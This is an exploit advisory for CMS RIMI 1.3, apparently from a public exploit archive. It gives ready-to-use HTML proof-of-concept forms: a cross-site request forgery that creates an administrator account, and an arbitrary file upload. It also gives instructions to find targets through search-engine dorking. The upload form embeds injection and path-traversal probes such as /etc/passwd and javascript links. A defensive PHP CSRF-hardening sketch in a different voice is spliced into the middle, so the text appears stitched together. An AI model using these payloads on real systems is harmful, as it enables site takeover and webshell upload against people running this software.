CMS RIMI 1.3 Cross Site Request Forgery / File Upload
CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.
=============================================================================================================================================
| # Title : CMS RIMI v1.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://github.com/myroot593/RIMICMS |
=============================================================================================================================================
poc :
[+] Dorking in Google or another search engine.
[+] The following HTML code creates a new admin.
[+] Go to line 9.
[+] Set the target site link, save changes and apply.
[+] Save the code as poc.html.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Profile User Form</title>
</head>
<body>
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">
<!-- Text input for username -->
<label for="username">Username:</label>
<input type="text" id="username" name="username" required>
<!-- Password input for password -->
<label for="password">Password:</label>
<input type="password" id="password" name="password" required>
<!-- Password input for confirm password -->
<label for="confirm_password">Confirm Password:</label>
<input type="password" id="confirm_password" name="confirm_password" required>
<!-- Text input for name -->
<label for="nama">Nama:</label>
<input type="text" id="nama" name="nama" required>
<!-- Text input for email -->
<label for="email">Email:</label>
<input type="email" id="email" name="email" required>
<!-- Hidden input for user ID -->
<input type="hidden" name="id" value="">
<!-- Submit button -->
<button type="submit">Submit</button>
</form>
</body>
</html>
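The form above works because admin/tambah-user.php accepts a plain POST from any origin. The following is an added hardening sketch, not code from the advisory or from the RIMICMS project: a hypothetical gate placed at the top of that handler, combining a per-session synchronizer token, a SameSite session cookie and an Origin/Referer check (the function names and the csrf_token field are assumptions).

```php
<?php
// Added hardening sketch for admin/tambah-user.php (hypothetical, not RIMICMS code):
// a per-session synchronizer token plus an Origin/Referer check, so a
// cross-site form such as poc.html cannot create an admin on the victim's behalf.
declare(strict_types=1);

session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',                 // browser drops the cookie on cross-site POSTs
    'secure'   => !empty($_SERVER['HTTPS']),
]);
session_start();
// One random token per session, embedded in the legitimate admin form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}
// Origin (or Referer as a fallback) must name our own host:port.
function same_origin_request(array $server): bool
{
    $expected = (string)($server['HTTP_HOST'] ?? '');
    $source   = (string)($server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '');
    $host = parse_url($source, PHP_URL_HOST);
    if (!is_string($host) || $host === '') {
        return false;                    // missing or unparsable header: reject
    }
    $port = parse_url($source, PHP_URL_PORT);
    $got  = $host . ($port ? ':' . $port : '');
    return $expected !== '' && hash_equals($expected, $got);
}
// Both checks must pass; hash_equals keeps the token compare constant-time.
function csrf_valid(array $post, array $server): bool
{
    $stored = (string)($_SESSION['csrf_token'] ?? '');
    $sent   = (string)($post['csrf_token'] ?? '');
    return $stored !== '' && hash_equals($stored, $sent) && same_origin_request($server);
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !csrf_valid($_POST, $_SERVER)) {
    http_response_code(403);
    exit('Request rejected: missing or invalid CSRF token');
}
// ... the original user-creation logic continues below this gate ...
?>
<!-- in the legitimate admin form, alongside the other fields: -->
<input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
```

With this gate in place, the poc.html form is rejected with a 403 because it carries neither a valid csrf_token field nor a matching Origin; the same gate can sit in front of tambah-berita.php.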
------------------ [+] Part 2 : arbitrary file upload [+] -------------
[+] Go to line 3.
[+] Set the target site link, save changes and apply.
[+] Your uploaded file : 127.0.0.1/cmsrimi/content
[+] Save the code as poc.html.
<p class="sukses-form"></p>
<p class="error-form"></p>
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">
<div class="form-group “>
<label>Judul :</label>
<input type="text” name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">
<span><p class="error-form"></p></span>
</div>
<div class="form-group “>
<label>Isi Berita :</label>
<textarea class="ckeditor” name="isi_berita" id="isi_berita"></textarea>
<span><p class="error-form"></p></span>
</div>
<div class="form-group">
<label>Kategori Berita :</label>
<select class=’form-control’ name=’kategori_berita’ id=’kategori_berita’ required=’’><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|||>!(()&&!|||</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=’"()>’"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1’">1’"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=’">’"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!–><!–</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select> <p class="error-form"></p>
</div>
<div class="form-group">
<label>Status:</label>
<select class="form-control" name="status_berita" id="status_berita">
<option value="Diterbitkan">Diterbitkan</option>
<option value="Draft">Draft</option>
</select>
</div>
<div class="form-group">
<label>Gambar Berita</label>
<input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">
<input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">
<p class="error-form"></p>
</div>
<button type="submit" class="btn btn-primary">Submit</button>
</form>
<p class="error-form"></p>
<p class="error-form"></p>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================